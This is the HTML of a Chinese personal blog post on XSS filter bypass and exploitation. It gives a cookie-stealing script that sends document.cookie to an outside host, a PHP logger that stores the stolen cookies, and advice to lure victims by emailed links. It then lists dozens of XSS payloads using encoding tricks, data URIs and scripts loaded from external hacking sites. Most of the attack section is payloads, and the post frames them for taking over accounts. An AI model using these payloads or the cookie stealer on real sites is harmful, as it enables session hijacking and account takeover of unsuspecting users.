<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="xss," />










<meta name="description" content="web">
<meta name="keywords" content="xss">
<meta property="og:type" content="article">
<meta property="og:title" content="xss的绕过和利用">
<meta property="og:url" content="http://yoursite.com/2019/03/17/xss的绕过和利用/index.html">
<meta property="og:site_name" content="似雍&amp;&amp;非庸">
<meta property="og:description" content="web">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-03-17T13:44:48.614Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="xss的绕过和利用">
<meta name="twitter:description" content="web">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/03/17/xss的绕过和利用/"/>





  <title>xss的绕过和利用 | 似雍&&非庸</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">似雍&&非庸</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">个人博客</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/17/xss的绕过和利用/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Alex">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/timg.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="似雍&&非庸">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">xss的绕过和利用</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-17T21:13:21+08:00">
                2019-03-17
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/xss/" itemprop="url" rel="index">
                    <span itemprop="name">xss</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          
              <div class="post-description">
                  web
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h4 id="xss"><a href="#xss" class="headerlink" title="xss"></a>xss</h4><p>XSS攻击全称跨站脚本攻击，是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS，XSS是一种在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。</p>
<p>XSS 大致分成三种类型）:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">反射型</span><br><span class="line">存储型</span><br><span class="line">DOM 型   如果用是否会存储在服务器上区分的话，DOM型也是反射型。</span><br></pre></td></tr></table></figure>
<p>原本应该是输入数据的地方，但是却变成成功运行的代码。就是<strong>xss</strong>。</p>
<p>hacker可以它写了这样一个文件 a.com/test.js</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">var img = document.createElement(&quot;img&quot;)</span><br><span class="line">img.src = &quot;http://www.a.com/?cookies=&quot;+escape(document.cookie);</span><br><span class="line">document.body.appendChild(img);</span><br></pre></td></tr></table></figure>
<p>而对应<a href="http://www.a.com/index.php的代码是这样，目的是记录发送过来的" target="_blank" rel="noopener">www.a.com/index.php的代码是这样，目的是记录发送过来的</a> cookies</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$c = $_GET[&quot;cookies&quot;];</span><br><span class="line">echo $c;</span><br><span class="line">error_log($c .&quot;&quot;. &quot;\n&quot;,3,&quot;/var/log/a/cookies&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<h5 id="然后再在输出框中输入"><a href="#然后再在输出框中输入" class="headerlink" title="然后再在输出框中输入 /"></a>然后再在输出框中输入 <script src="//www.a.com/test.js">/</script></h5><p>就会直接将你的 cookies 直接发送到 a.com<br>有了你的 cookies 就为所欲为了，改密码什么的。 现在只需诱导用户（发邮件之类的）点击链接就Ok了 </p>
<h4 id="利用代码"><a href="#利用代码" class="headerlink" title="利用代码"></a>利用代码</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=1 onerror=&quot;alert(1);&quot;&gt;</span><br><span class="line">&lt;script&gt;alert(1);&lt;/script&gt;</span><br><span class="line">&lt;body onload=&quot;alert(&apos;xss&apos;)&quot;&gt;&lt;/body&gt;</span><br><span class="line">&lt;p onclick=&quot;alert(&apos;1&apos;)&quot; style=&quot;postion:fixed;width:100%;heith:100%&quot;&gt;&amp;nbsp;&lt;/p&gt;</span><br><span class="line">&lt;input onfocus=&quot;alert(&apos;1&apos;)&quot; autofocus/&gt;</span><br><span class="line"></span><br><span class="line">1.不使用 &quot; </span><br><span class="line"></span><br><span class="line"> &lt;input onfocus=alert(&apos;1&apos;) autofocus/&gt;</span><br><span class="line"></span><br><span class="line">2.不使用 &apos;  </span><br><span class="line"></span><br><span class="line">&lt;input onfocus=&quot;alert(/1/)&quot; autofocus/&gt;</span><br><span class="line"></span><br><span class="line">3.不使用 ( )  </span><br><span class="line"></span><br><span class="line">&lt;input onfocus=&quot;alert`&apos;1&apos;`&quot; autofocus/&gt;</span><br><span class="line"></span><br><span class="line">4.不使用 &apos; &quot; ( )</span><br><span class="line"></span><br><span class="line"> &lt;input onfocus=alert`1` autofocus/&gt;</span><br><span class="line"></span><br><span class="line">5.使用html实体编码绕过</span><br><span class="line"></span><br><span class="line"> &lt;input onfocus=&quot;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#49;&amp;#39;&amp;#41;&quot; autofocus/&gt;</span><br><span class="line"></span><br><span class="line">6.使用html实体编码绕过变形 </span><br><span class="line"></span><br><span class="line">&lt;input onfocus=&quot;&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116&amp;#40&amp;#39&amp;#49&amp;#39&amp;#41&quot; autofocus/&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">1.在iframe标签中加载一个脚本页面</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;./alert.html&quot;&gt;&lt;/iframe&gt;</span><br><span class="line"></span><br><span class="line">2.在script标签中加载一个脚本</span><br><span class="line"></span><br><span class="line"> &lt;script src=&quot;./alert.js&quot;&gt;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">在src属性中可以使用可以直接请求一个外部连接，还可以用Data URI scheme直接嵌入文本</span><br><span class="line"></span><br><span class="line">Example：</span><br><span class="line"></span><br><span class="line">1.在iframe标签中使用Data URI scheme直接嵌入文本</span><br><span class="line"></span><br><span class="line"> &lt;iframe src=&quot;data:text/html,&lt;script&gt;alert(&apos;1&apos;)&lt;/script&gt;&quot;&gt;&lt;/iframe&gt;</span><br><span class="line"></span><br><span class="line">2.在script标签中使用Data URI scheme直接嵌入文本 </span><br><span class="line"></span><br><span class="line">&lt;script src=&quot;data:text/html,alert(&apos;1&apos;)&quot;&gt;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">使用Data URI scheme直接嵌入文本，比较繁琐，但是这类的好处在于可以使用BASE64编码格式</span><br><span class="line"></span><br><span class="line">Example:</span><br><span class="line"></span><br><span class="line">1.在iframe标签中使用Data URI scheme直接嵌入BASE64编码后的文本</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgnMScpPC9zY3JpcHQ+&quot;&gt;&lt;/iframe&gt;</span><br><span class="line"></span><br><span class="line">2.在script标签中使用Data URI scheme直接嵌入BASE64编码后的文本</span><br><span class="line"></span><br><span class="line">&lt;script src=&quot;data:text/html;base64,YWxlcnQoJzEnKQ==&quot;&gt;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">在该类型的变形中还可以结合第一类的变形使用</span><br><span class="line"></span><br><span class="line">Example:</span><br><span class="line"></span><br><span class="line">1.使用html实体编码URI </span><br><span class="line"></span><br><span class="line">&lt;script src=&quot;&amp;#46;&amp;#47;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#46;&amp;#106;&amp;#115;&quot;&gt;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">2.使用html实体编码Data URI scheme</span><br><span class="line"></span><br><span class="line"> &lt;script src=&quot;&amp;#100;&amp;#97;&amp;#116;&amp;#97;&amp;#58;&amp;#116;&amp;#101;&amp;#120;&amp;#116;&amp;#47;&amp;#104;&amp;#116;&amp;#109;&amp;#108;&amp;#44;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#49;&amp;#39;&amp;#41;&quot;&gt;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">3.使用html实体编码BASE64编码之后的Data URI scheme</span><br><span class="line"></span><br><span class="line"> &lt;script src=&quot;&amp;#100;&amp;#97;&amp;#116;&amp;#97;&amp;#58;&amp;#116;&amp;#101;&amp;#120;&amp;#116;&amp;#47;&amp;#104;&amp;#116;&amp;#109;&amp;#108;&amp;#59;&amp;#98;&amp;#97;&amp;#115;&amp;#101;&amp;#54;&amp;#52;&amp;#44;&amp;#89;&amp;#87;&amp;#120;&amp;#108;&amp;#99;&amp;#110;&amp;#81;&amp;#111;&amp;#74;&amp;#122;&amp;#69;&amp;#110;&amp;#75;&amp;#81;&amp;#61;&amp;#61;&quot;&gt;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">-------------------------------------------------</span><br><span class="line">常用的xss</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;table background=&apos;javascript.:alert(([code])&apos;&gt;&lt;/table&gt;</span><br><span class="line"></span><br><span class="line">&lt;object type=text/html data=&apos;javascript.:alert(([code]);&apos;&gt;&lt;/object&gt;</span><br><span class="line"></span><br><span class="line">&quot;+alert(&apos;XSS&apos;)+&quot;</span><br><span class="line"></span><br><span class="line">&apos;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">=&apos;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert(vulnerable)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;s&amp;#99;ript&gt;alert(&apos;XSS&apos;)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;img src=&quot;javas&amp;#99;ript:alert(&apos;XSS&apos;)&quot;&gt;</span><br><span class="line"></span><br><span class="line">%0a%0a&lt;script&gt;alert(\&quot;Vulnerable\&quot;)&lt;/script&gt;.jsp</span><br><span class="line"></span><br><span class="line">%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e</span><br><span class="line"></span><br><span class="line">%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e</span><br><span class="line"></span><br><span class="line">%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html</span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert(&apos;Vulnerable&apos;)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">a.jsp/&lt;script&gt;alert(&apos;Vulnerable&apos;)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&quot;&gt;&lt;script&gt;alert(&apos;Vulnerable&apos;)&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG SRC=&quot;javascript.:alert(&apos;XSS&apos;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG src=&quot;/javascript.:alert&quot;(&apos;XSS&apos;)&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG src=&quot;/JaVaScRiPt.:alert&quot;(&apos;XSS&apos;)&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG src=&quot;/JaVaScRiPt.:alert&quot;(&amp;quot;XSS&amp;quot;)&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG SRC=&quot;jav&amp;#x09;ascript.:alert(&apos;XSS&apos;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG SRC=&quot;jav&amp;#x0A;ascript.:alert(&apos;XSS&apos;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG SRC=&quot;jav&amp;#x0D;ascript.:alert(&apos;XSS&apos;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&quot;&lt;IMG src=&quot;/java&quot;\0script.:alert(\&quot;XSS\&quot;)&gt;&quot;;&apos;&gt;out</span><br><span class="line"></span><br><span class="line">&lt;IMG SRC=&quot; javascript.:alert(&apos;XSS&apos;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt;</span><br><span class="line"></span><br><span class="line">&lt;BODY BACKGROUND=&quot;javascript.:alert(&apos;XSS&apos;)&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG DYNSRC=&quot;javascript.:alert(&apos;XSS&apos;)&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG LOWSRC=&quot;javascript.:alert(&apos;XSS&apos;)&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;BGSOUND SRC=&quot;javascript.:alert(&apos;XSS&apos;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;br size=&quot;&amp;&#123;alert(&apos;XSS&apos;)&#125;&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;LAYER SRC=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/layer&gt;</span><br><span class="line"></span><br><span class="line">&lt;LINK REL=&quot;stylesheet&quot;HREF=&quot;javascript.:alert(&apos;XSS&apos;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG SRC=&apos;vbscript.:msgbox(&quot;XSS&quot;)&apos;&gt;</span><br><span class="line"></span><br><span class="line">&lt;META. HTTP-EQUIV=&quot;refresh&quot;CONTENT=&quot;0;url=javascript.:alert(&apos;XSS&apos;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;IFRAME. src=&quot;/javascript.:alert&quot;(&apos;XSS&apos;)&gt;&lt;/IFRAME&gt;</span><br><span class="line"></span><br><span class="line">&lt;FRAMESET&gt;&lt;FRAME. src=&quot;/javascript.:alert&quot;(&apos;XSS&apos;)&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;</span><br><span class="line"></span><br><span class="line">&lt;TABLE BACKGROUND=&quot;javascript.:alert(&apos;XSS&apos;)&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;DIV STYLE=&quot;background-image: url(javascript.:alert(&apos;XSS&apos;))&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;DIV STYLE=&quot;behaviour: url(&apos;http://www.how-to-hack.org/exploit.html&amp;#39;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;</span><br><span class="line"></span><br><span class="line">&lt;IMG STYLE=&apos;xss:expre\ssion(alert(&quot;XSS&quot;))&apos;&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">--------------------------------------------------</span><br><span class="line"></span><br><span class="line">在url中的xss</span><br><span class="line">可以通过加#来进行利用（http://www.example.com/index.html#print就代表网页index.html的print位置。浏览器读取这个URL后，会自动将print位置滚动至可视区域。）</span><br><span class="line">或者&amp;（后端变成切换参数，但在前端就是字符）</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div></div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/wechatpay.png" alt="Alex 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/alipay.jpg" alt="Alex 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/xss/" rel="tag"># xss</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/10/ctf中web的常见知识点/" rel="next" title="ctf中web的常见知识点">
                <i class="fa fa-chevron-left"></i> ctf中web的常见知识点
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/26/nmap的使用/" rel="prev" title="nmap的使用">
                nmap的使用 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/timg.jpg"
                alt="Alex" />
            
              <p class="site-author-name" itemprop="name">Alex</p>
              <p class="site-description motion-element" itemprop="description">在你知道更好方法前尽你所能，在你知道更好方法后，再做得更好。Do the best you can until you know better.Then, when you know better,do better.</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">23</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
          <br>

          <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=200436&auto=1&height=66"></iframe>

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#xss"><span class="nav-number">1.</span> <span class="nav-text">xss</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#然后再在输出框中输入"><span class="nav-number">1.1.</span> <span class="nav-text">然后再在输出框中输入 /</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用代码"><span class="nav-number">2.</span> <span class="nav-text">利用代码</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018/9 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Alex</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
